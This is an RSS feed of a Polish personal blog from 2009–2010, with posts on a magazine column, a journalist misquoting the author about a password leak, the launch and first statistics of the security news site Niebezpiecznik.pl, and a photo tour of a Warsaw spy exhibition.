<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel><title>Piotr Konieczny</title><link>http://blog.konieczny.be/</link><description>Wpisy z dziennika internetowego Jogger, wspomaganego przez Jabbera</description><lastBuildDate>Wed, 10 Mar 2010 03:44:29 +0100</lastBuildDate><generator>JoggerPL</generator><item><title>Felieton dla PRESS-a</title><link>http://blog.konieczny.be/2010/02/22/felieton-dla-press-a/</link><description>&lt;p&gt;Parę miesięcy temu &lt;a href=&quot;http://press.pl&quot;&gt;PRESS&lt;/a&gt; poprosił mnie o napisanie paru słów o tym, w jaki sposób korzystam z sieci i które z serwisów internetowych &quot;lubię&quot; najbardziej. &lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8938809/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8938809_e44a023fd3_m.jpg&quot; width=&quot;177&quot; height=&quot;240&quot; alt=&quot;interranking konieczny.pdf (1 page)-1&quot; align=&quot;left&quot;&gt;&lt;/a&gt; To chyba pierwszy tekst dla prasy, w którym starałem się pisać jak najmniej o bezpieczeństwie ;-) Okazało się to cholernie trudne i dlatego w tekście znajdziecie wskazówki jak obejść blokadę stron WWW w pracy i jak &quot;wylifehackingować&quot; sobie tańsze bilety lotnicze lub zniżkę na samochód.&lt;br&gt;
&lt;br&gt;
Najbardziej &quot;dumny&quot; jestem z obserwacji, do której doszedłem w trakcie pisania: &quot;jeśli w Polsce lub na świecie dzieje się coś istotnego, informacja o tym sama mnie znajduje&quot;. Niestety, czy tego chce, czy nie... o podobnym problemie pisał niedawno &lt;a href=&quot;http://wampir.mroczna-zaloga.org/archives/819-leb-prawie-20-czyli-cos-trzeba-zmienic.html&quot;&gt;Paweł&lt;/a&gt;.&lt;br&gt;
&lt;br&gt;
Podsumowując; gdyby kogoś interesowało, dlaczego nie czytam Onetu (i reszty polskich portali), co mam w Google Readerze, gdzie tanio kupić elektronikę w sieci, przez jaki serwis słucham muzyki i czym synchronizuje iPhone'a z laptopem -- zapraszam do kiosków po lutowy numer PRESS-a.&lt;br&gt;
&lt;br&gt;
P.S. Okazuje się, że kontakt z redaktorami może jednak być miły i na poziomie. Pod warunkiem, że nie są to &lt;a href=&quot;http://blog.konieczny.be/2009/11/26/atak-ktorego-nie-bylo/&quot;&gt;redaktorzy Dziennika&lt;/a&gt; ;&amp;gt;&lt;/p&gt;
</description><pubDate>Mon, 22 Feb 2010 19:04:37 +0100</pubDate><guid>http://blog.konieczny.be/2010/02/22/felieton-dla-press-a/</guid><category>IT</category><category>PRESS</category><category>interranking</category></item><item><title>Atak którego nie było...</title><link>http://blog.konieczny.be/2009/11/26/atak-ktorego-nie-bylo/</link><description>&lt;p&gt;Przedczoraj na Niebezpieczniku opublikowaliśmy informację o forum, na którym ktoś umieścił &lt;a href=&quot;http://niebezpiecznik.pl/post/ogromny-wyciek-hasel-polskich-internautow/&quot;&gt;hasła użytkowników&lt;/a&gt; (głównie polskiego internetu) do wielu, naprawdę wielu portali.&lt;br&gt;
&lt;br&gt;
Wczoraj Sylwia Czubkowska z Dziennik.pl poprosiła mnie o komentarz do sprawy. Na pytanie (pisownia oryginalna):&lt;/p&gt;
&lt;p&gt;
&lt;blockquote&gt;Jak Państwo oceniają co to za włamanie, znaczy się po co kraść hasła w potem je upubliczniać?&lt;/blockquote&gt;
&lt;p&gt;odpowiedziałem:&lt;/p&gt;
&lt;blockquote&gt;Najprawdopodobniej chodzi tu o wzbudzenie respektu wśród społeczności phisherow/crackerow i zamanifestowanie swoich możliwości, co oczywiście może przełożyć się na realne zyski. Jeśli cracker jest wiarygodny (często postuje duże ilości *działających* haseł) to do niego w pierwszej kolejności zgłoszą się spamerzy szukajacy botnetu do wynajęcia.&lt;/blockquote&gt;
&lt;p&gt;A oto, co zrobił z poniższej wypowiedzi redaktor Dziennika: &lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8585729/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8585729_36af3d5cf8_o.jpg&quot; width=&quot;548&quot; height=&quot;102&quot; alt=&quot;Atak hakerów. Wyciekły hasła i loginy - Wydarzenia - Dziennik.pl&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Od wczoraj proszę o przywrócenie oryginalnego brzmienia mojej wypowiedzi -- bezskutecznie. Pani Sylwia podzieliła co prawda moje odczucia, bo sama nie jest zadowolona z tego artykułu (podobno redaktor wprowadził poprawki do jej tekstu). Dowiedziałem się, że artykuł zostanie poprawiony zgodnie z moimi sugestiami m.in. dot. niepoprawnego zastąpienia crackera &quot;hakerem&quot; ...i został, na coś takiego:&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8585738/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8585738_f94f12d455_o.jpg&quot; width=&quot;597&quot; height=&quot;101&quot; alt=&quot;Atak hakerów. Wyciekły hasła i loginy - Wydarzenia - Dziennik.pl-1&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
...nie wiem, jak ktoś mógł *ponownie* dopuścić się takiej fuszerki!? Na kolejnego e-maila jeszcze nie dostałem odpowiedzi. Może obstawimy, na co teraz zmienią? :&amp;gt;&lt;br&gt;
&lt;br&gt;
P.S.&lt;br&gt;
Zauważcie, że Niebezpiecznik.pl nigdzie nie napisał, że wyciek haseł nastąpił z polskich serwisów... Napisaliśmy, że hasła internautów do wielu polskich serwisów zostały przechwycone, najprawdopodobniej przez trojana. &lt;b&gt;Dziennikarze jednak widzą co chcą&lt;/b&gt; i od wczoraj na niektórych serwisach pojawiają się wiadomości sugerujące zmasowany i OMG WTF atak na polskie portale...&lt;br&gt;
&lt;br&gt;
Ktoś jeszcze chce zaprzeczyć, że dziennikarze nie są piątą władzą? Jeśli większość artykułów z dziedzin na których się nie znam jest tak rzetelna, to chyba przestaję czytać prasę...&lt;br&gt;
&lt;br&gt;
P.S.2&lt;br&gt;
Z racji ogromnego ruchu, Niebezpiecznik szuka sponsora, który wyłoży kasę na hosting :&amp;gt;&lt;/p&gt;
</description><pubDate>Thu, 26 Nov 2009 16:50:25 +0100</pubDate><guid>http://blog.konieczny.be/2009/11/26/atak-ktorego-nie-bylo/</guid><category>IT</category><category>przekręty</category><category>security</category><category>niebezpiecznik</category><category>dziennikarstwo</category><category>dziennik</category><category>hasła</category></item><item><title>Niebezpieczne wiadomości</title><link>http://blog.konieczny.be/2009/11/19/niebezpieczne-wiadomosci/</link><description>&lt;p&gt;...czyli wieści z pierwszych dwóch tygodni &lt;a href=&quot;http://niebezpiecznik.pl&quot;&gt;Niebezpiecznika&lt;/a&gt;.&lt;br&gt;
&lt;br&gt;
Wydaje mi się, że projekt Niebezpiecznik.pl został przyjęty dość dobrze... Po dwóch tygodniach od startu mamy:&lt;br&gt;
&lt;br&gt;
• &lt;b&gt;846&lt;/b&gt; stałych czytelników &lt;a href=&quot;http://feeds.feedburner.com/niebezpiecznik&quot;&gt;przez RSS&lt;/a&gt;,&lt;br&gt;
• &lt;b&gt;63&lt;/b&gt; stałych czytelników &lt;a href=&quot;http://feedburner.google.com/fb/a/mailverify?uri=niebezpiecznik&quot;&gt;przez e-mail&lt;/a&gt;&lt;br&gt;
• i dokładnie &lt;b&gt;95&lt;/b&gt; obserwatorów &lt;a href=&quot;http://niebezpiecznik.blip.pl&quot;&gt;na Blipie&lt;/a&gt;. &lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8548410/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8548410_3b999b0112_m.jpg&quot; width=&quot;240&quot; height=&quot;94&quot; alt=&quot;Feedburner&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
&lt;b&gt;Tyle osób nas już odwiedziło:&lt;/b&gt;&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8548408/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8548408_dd5083fccf_o.jpg&quot; width=&quot;275&quot; height=&quot;115&quot; alt=&quot;Dashboard - Google Analytics-1&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
&lt;b&gt;Większość weszła bezpośrednio:&lt;/b&gt;&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8548411/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8548411_f1eb9656d3_o.jpg&quot; width=&quot;281&quot; height=&quot;111&quot; alt=&quot;Traffic Sources Overview - Google Analytics&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
&lt;b&gt;I spędziła u nas ok. 3 min.:&lt;/b&gt;&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8548409/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8548409_c5e44ed5e6_o.jpg&quot; width=&quot;318&quot; height=&quot;114&quot; alt=&quot;Dashboard - Google Analytics&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;Jakie tematy poruszył Niebezpiecznik?&lt;/h3&gt;
&lt;p&gt;Jeśli jeszcze nas nie czytasz, to zobacz co straciłeś ;) Poniżej lista TOP10 postów:&lt;br&gt;
&lt;br&gt;
• &lt;a href=&quot;http://niebezpiecznik.pl/post/fotoradar-injection/&quot;&gt;Fotoradar Injection&lt;/a&gt;&lt;br&gt;
opisujący sprytny pomysł na wykiwanie fotoradaru ;)&lt;br&gt;
&lt;br&gt;
• &lt;a href=&quot;http://niebezpiecznik.pl/post/spoofing-sms-czyli-falszowanie-nadawcy-sms-a/&quot;&gt;SMS - Spoofing numeru nadawcy&lt;/a&gt;&lt;br&gt;
tłumaczymy jak podszywać się pod dowolny numer telefonu komórkowego (i oczywiście jak takie oszustwo wykrywać)&lt;br&gt;
&lt;br&gt;
• &lt;a href=&quot;http://niebezpiecznik.pl/post/przetestuj-swojego-antywirusa/&quot;&gt;Przetestuj swojego antywirusa&lt;/a&gt;&lt;br&gt;
kilka testów, które sprawdzą jak szczelnie twój program antywirusowy chroni twój komputer&lt;br&gt;
&lt;br&gt;
• &lt;a href=&quot;http://niebezpiecznik.pl/post/infekcja-falszywym-antyvirusem-video/&quot;&gt;[VIDEO] atak Drive-By download&lt;/a&gt;&lt;br&gt;
prezentacja zainfekowania komputera poprzez stronę WWW&lt;br&gt;
&lt;br&gt;
• &lt;a href=&quot;http://niebezpiecznik.pl/post/lifehacking-zamek-otwierany-pukaniem/&quot;&gt;[VIDEO] Zamek otwierany pukaniem&lt;/a&gt;&lt;br&gt;
pokaz niekonwencjonalnego zamka do drzwi...&lt;br&gt;
&lt;br&gt;
• &lt;a href=&quot;http://niebezpiecznik.pl/post/strzez-pin-swojej-kobiety/&quot;&gt;[FOTO] Jak strzec PIN-u swojej kobiety&lt;/a&gt;&lt;br&gt;
dowcipny demotywator z pogranicza humoru i bezpieczeństwa ;-)&lt;br&gt;
&lt;br&gt;
• &lt;a href=&quot;http://niebezpiecznik.pl/post/konkurs-dla-niebezpiecznikow/&quot;&gt;Konkurs ;-)&lt;/a&gt;&lt;br&gt;
nasz &quot;hackme&quot; z nagrodami.&lt;br&gt;
&lt;br&gt;
• &lt;a href=&quot;http://niebezpiecznik.pl/post/114-skryptow-do-testow-penetracyjnych/&quot;&gt;114 skryptów przydatnych przy testach penetracyjnych&lt;/a&gt;&lt;br&gt;
zbiór narzędzi pomagających wykonać test penetracyjny&lt;br&gt;
&lt;br&gt;
• &lt;a href=&quot;http://niebezpiecznik.pl/post/sekrety-firm-antywirusowych/&quot;&gt;Sekrety firm antywirusowych&lt;/a&gt;&lt;br&gt;
kilka branżowych sekretów -- czy zagrażają naszemu bezpieczeństwu?&lt;br&gt;
&lt;br&gt;
• &lt;a href=&quot;http://niebezpiecznik.pl/post/exif-iphone-gps-i-nagie-fotki/&quot;&gt;iPhone i nagie fotki&lt;/a&gt;&lt;br&gt;
czyli jak znaleźć modelkę po informacjach zawartych w EXIF&lt;br&gt;
&lt;br&gt;
P.S. Do pierwotnej ekipy dołączyły też dwie nowe osoby, ale i tak czekamy na &lt;a href=&quot;http://niebezpiecznik.pl/podeslij-newsa/&quot;&gt;twój artykuł&lt;/a&gt; ;-)&lt;/p&gt;
</description><pubDate>Thu, 19 Nov 2009 19:59:24 +0100</pubDate><guid>http://blog.konieczny.be/2009/11/19/niebezpieczne-wiadomosci/</guid><category>IT</category><category>ja</category><category>security</category><category>niebezpiecznik</category><category>hacking</category></item><item><title>O północy rusza Niebezpiecznik.pl</title><link>http://blog.konieczny.be/2009/10/31/o-polnocy-rusza-niebezpiecznik-pl/</link><description>&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8438501/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8438501_55fad6c0b4_o.jpg&quot; width=&quot;500&quot; height=&quot;149&quot; alt=&quot;Photoshop-1&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Kilka miesięcy temu wraz z paroma znajomymi doszliśmy do wniosku, że w Polsce nie istnieje żaden dobry vortal poświęcony wyłącznie zagadnieniom związanym z bezpieczeństwem komputerowym... Po paru piwach, postanowiliśmy to zmienić :)&lt;/p&gt;
&lt;p&gt;
&lt;blockquote&gt;Dziś, o północy, nastąpi &lt;b&gt;premiera serwisu&lt;/b&gt; &lt;a href=&quot;http://niebezpiecznik.pl&quot;&gt;Niebezpiecznik.pl&lt;/a&gt;.&lt;/blockquote&gt;
&lt;p&gt;W końcu dla serwisu o tak mrocznej tematyce nie ma lepszej premiery jak przełom Halloween i Św. Zmarłych... ;-)&lt;/p&gt;
&lt;h3&gt;Czym jest Niebezpiecznik.pl?&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;http://niebezpiecznik.pl&quot;&gt;Niebezpiecznik&lt;/a&gt; będzie dostarczał informacji i praktycznych porad ze świata bezpieczeństwa komputerowego. Ma służyć jako platforma komunikacji i poszerzania wiedzy zarówno dla specjalistów ds. bezpieczeństwa, pentesterów, administratorów danych osobowych, jak i zwykłych ludzi, zainteresowanych tematyką bezpiecznego korzystania z komputera i internetu. Już teraz można go zasubskrybować przez:&lt;/p&gt;
&lt;div style=&quot;margin-left:200px;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;•&lt;a href=&quot;http://feeds.feedburner.com/niebezpiecznik/&quot;&gt;RSS&lt;/a&gt; (pełna treść dostępna po północy)&lt;/li&gt;
&lt;li&gt;•&lt;a href=&quot;http://feedburner.google.com/fb/a/mailverify?uri=niebezpiecznik&quot;&gt;newsletter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;•&lt;a href=&quot;http://niebezpiecznik.blip.pl&quot;&gt;Blip&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;•&lt;a href=&quot;http://twitter.com/niebezpiecznik&quot;&gt;Twitter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p&gt;Zapraszam do współpracy nad Niebezpiecznikiem. Zwłaszcza tych, którzy udzielają się na tagu #&lt;a href=&quot;http://blip.pl/tags/security&quot;&gt;security&lt;/a&gt; na Blipie.&lt;/p&gt;
&lt;h3&gt;Co z *grin*blogiem?&lt;/h3&gt;
&lt;p&gt;Co się zaś tyczy tego bloga — on nie umiera. Dalej będę tu pisał i o swoich prywatnych przemysleniach i o bezpieczeństwie, chociaż nie ukrywam, że większość rzeczy związanych z security będę wpychał raczej na Niebezpiecznika — dlatego, jesli chcecie być na czasie, &lt;b&gt;zachęcam do subskrybcji Niebezpiecznika&lt;/b&gt; &lt;a href=&quot;http://feeds.feedburner.com/niebezpiecznik/&quot;&gt;RSS&lt;/a&gt; / &lt;a href=&quot;http://feedburner.google.com/fb/a/mailverify?uri=niebezpiecznik&quot;&gt;newsletter&lt;/a&gt; / &lt;a href=&quot;http://niebezpiecznik.blip.pl&quot;&gt;Blip&lt;/a&gt; / &lt;a href=&quot;http://twitter.com/niebezpiecznik&quot;&gt;Twitter&lt;/a&gt;.&lt;/p&gt;
</description><pubDate>Sat, 31 Oct 2009 19:49:44 +0100</pubDate><guid>http://blog.konieczny.be/2009/10/31/o-polnocy-rusza-niebezpiecznik-pl/</guid><category>IT</category><category>ja</category><category>lifehacking</category><category>porady</category><category>security</category><category>niebezpiecznik</category><category>bezpieczeństwo</category><category>hacking</category></item><item><title>Wystawa Szpiegów w Warszawie (zdjęcia)</title><link>http://blog.konieczny.be/2009/10/28/wystawa-szpiegow-w-warszawie-zdjecia/</link><description>&lt;p&gt;Wczoraj, zachęceni &lt;a href=&quot;http://spyworld.pl&quot; rel=&quot;nofollow&quot;&gt;stroną-reklamą&lt;/a&gt;, wybraliśmy się z M. na &lt;b&gt;Wystawę Szpiegów&lt;/b&gt; do Pałacu Kultury i Nauki. Wystawę można podsumować jednym słowem: &lt;b&gt;rozczarowanie&lt;/b&gt;.&lt;br&gt;
&lt;br&gt;
W internecie wystawa prezentuje się zachęcająco; świetna strona WWW, w programie zwiedzania zagadki, łamigłówki i interaktywne eksponaty... Już mieliśmy nadzieję na przeżycia na miarę odwiedzonego rok temu &lt;i&gt;Toronto Science Center&lt;/i&gt;... ale rzeczywistość okazała się bardzo &quot;warszawska&quot;: tj. szara, betonowa i nudna ;p Wspomniane na strone &quot;interaktywne zabawy&quot; polegały na zapamiętaniu: tego co jest w walizce i odpowiedzeniu na komputerze na 5 pytań (nazwa zabawy na stronie WWW: &lt;i&gt;kontrola bagażu bez wpadki&lt;/i&gt;), zapamiętaniu tego co jest w dowodzie agenta i odpowiedzeniu na komputerze na 5 pytań (nazwa zabawy na stronie WWW: &lt;i&gt;szkolenie szpiega&lt;/i&gt;), doklejeniu sobie wirtualnych wąsów na komputerze (nazwa zabawy na stronie WWW: &lt;i&gt;zmiana tożsamości&lt;/i&gt;), zobaczeniu się na monitorze (nazwa zabawy na stronie WWW: &lt;i&gt;wykrywanie kamer&lt;/i&gt;). &lt;i&gt;Łamania kodów i szyfrów&lt;/i&gt; nie zauważyłem, była za to pocztówka z napisem wykonanym farbą widzialną tylko w UV (dziwne, że można było ją zobaczyć gołym okiem)...&lt;br&gt;
&lt;br&gt;
&lt;b&gt;Muzea w Polsce zawsze kojarzyły mi się z nudą i ciszą&lt;/b&gt;... rozwydrzone wycieczki gimnazjalistów, biegające po Pałacu Kultury i Nauki zmieniły moje zdanie. Teraz polskie muzea są chyba tylko nudne...&lt;br&gt;
&lt;br&gt;
Mimo wszystko, prezentuje poniżej co ciekawsze zdjęcia (można je było robić legalnie, bez dodatkowej opłaty, i to moim zdaniem jedyny plus tej wystawy):&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417876/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417876_6506f47bdb_m.jpg&quot; width=&quot;240&quot; height=&quot;227&quot; alt=&quot;P1050952 | Zooomr Photo Sharing&quot;&gt;&lt;/a&gt;&lt;br&gt;
jedna z agencji wywiadowczych ma w logo znak Batmana? :-)&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417705/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417705_4fe073706d_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;P1050954&quot;&gt;&lt;/a&gt;&lt;br&gt;
tu trzeba było znaleźć ukrytą kamerę...&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417713/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417713_53401a3c2e_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050955&quot;&gt;&lt;/a&gt;&lt;br&gt;
zestaw łamaków do otwierania samochodów. Urzekł mnie podpis: &quot;Krajsler&quot;...&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417725/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417725_adde020584_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;P1050956&quot;&gt;&lt;/a&gt;&lt;br&gt;
Aparat Leicy umożliwiający robienie zdjęć przy zasłoniętym obiektywie.&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417732/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417732_4945cc7374_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;P1050957&quot;&gt;&lt;/a&gt;&lt;br&gt;
Bardzo ukryta kamera.&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417740/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417740_582b4eba42_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050958&quot;&gt;&lt;/a&gt;&lt;br&gt;
Zegarki-dyktafony. Ale ciekawsza, moim zdaniem, jest &quot;urwana&quot; ręka ;-)&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417752/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417752_f0ea9bcb05_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050961&quot;&gt;&lt;/a&gt;&lt;br&gt;
Było też o Echelonie...&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417759/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417759_86d6bdb56f_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050962&quot;&gt;&lt;/a&gt;&lt;br&gt;
Czego brakuje na tym obrazku?&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417769/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417769_e7d209eb6b_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050964&quot;&gt;&lt;/a&gt;&lt;br&gt;
Jakby ktoś chciał ROT-ować...&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417774/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417774_b4f5a0c5ac_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;P1050968&quot;&gt;&lt;/a&gt;&lt;br&gt;
Enigma (ani słowem nie wspomniano, że Polacy nie musieli łamać szyfru...)&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417778/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417778_d2c95424db_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;P1050969&quot;&gt;&lt;/a&gt;&lt;br&gt;
To obowiązkowo powinno zawisnąć w pociągach IC Kraków-Warszawa&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417784/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417784_d3cb6f972a_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;P1050971&quot;&gt;&lt;/a&gt; &lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417790/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417790_36d21e5fbd_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050973&quot;&gt;&lt;/a&gt;&lt;br&gt;
Gołębie pocztowe, zrzucane na spadochronach (albo bez). Robiły zdjęcia i przenosiły je do dowództwa.&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417794/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417794_12017c8f49_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050974&quot;&gt;&lt;/a&gt;&lt;br&gt;
Stopa zakładana pod buta, spoofowała odcisk podeszfy&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417797/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417797_d5de1e84bb_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;P1050975&quot;&gt;&lt;/a&gt;&lt;br&gt;
przenośny zestaw narzędzi do przeszukiwania mieszkań...&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417803/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417803_5d2ce55e04_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050977&quot;&gt;&lt;/a&gt;&lt;br&gt;
nurkonapędzacz&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8417808/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8417808_0f2f43b661_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050978&quot;&gt;&lt;/a&gt;&lt;br&gt;
pistolet ukryty w wiertarce...&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8418010/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8418010_4dd3d0950c_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;P1050979&quot;&gt;&lt;/a&gt;&lt;br&gt;
Znów jak w Batmanie - pistolet strzelający drabinką...&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8418013/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8418013_7401677db4_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050980&quot;&gt;&lt;/a&gt;&lt;br&gt;
Prawie rycerska rękawica, chroni przed dźganiem ;)&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8418017/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8418017_37fa60716c_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;P1050981&quot;&gt;&lt;/a&gt; &lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8418020/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8418020_6e1386e065_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;P1050982&quot;&gt;&lt;/a&gt;&lt;br&gt;
noże w wisorku-krzyżyku i monecie&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8418039/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8418039_ace9cc204a_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;P1050984&quot;&gt;&lt;/a&gt; &lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8418026/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8418026_930cb85645_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050983&quot;&gt;&lt;/a&gt;&lt;br&gt;
coś dla pań: nóż w szmince i pistolet w pierścionku&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8418054/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8418054_85757c111d_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050985&quot;&gt;&lt;/a&gt;&lt;br&gt;
telefon w paczce papierosów...&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8418066/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8418066_c68972c11e_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;P1050987&quot;&gt;&lt;/a&gt;&lt;br&gt;
instrukcja CIA dot. materiałów wybuchowych&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8418084/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8418084_671fa2b0fb_m.jpg&quot; width=&quot;240&quot; height=&quot;180&quot; alt=&quot;P1050990&quot;&gt;&lt;/a&gt; &lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8418094/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8418094_ecb5d02b05_m.jpg&quot; width=&quot;180&quot; height=&quot;240&quot; alt=&quot;P1050991&quot;&gt;&lt;/a&gt;&lt;br&gt;
